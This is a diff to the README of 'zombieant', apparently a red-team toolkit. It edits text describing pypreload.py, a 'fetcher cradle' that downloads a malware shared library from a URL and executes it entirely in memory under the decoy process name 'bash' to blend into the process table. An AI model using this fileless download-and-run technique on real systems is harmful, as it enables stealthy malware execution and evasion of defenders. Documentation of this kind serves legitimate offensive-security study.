dsnezhkov/zombieant/README.md

 ```sh
 $ pypreload.py  -t so -l http://127.0.0.1:8080/libmctor.so -d bash -c /bin/ls
 ```
-Here, we fetch our malware module into memory, and execute its functionality preloading a decoy command, all in memory.
+Here, we fetch our malware module into memory, and execute its functionality preloading a decoy command (bash), all in memory.

+> Note: `bash` here is the decoy for the process name we do not use any bash functionality.
+It just looks good in the process table :)

 Consider execution context:

-Internal OS file descriptors for pypreload fetcher cradle:
+Internal OS file descriptors for pypreload fetcher cradle during runtime:

 ```sh
 $ ls -l /proc/56417/fd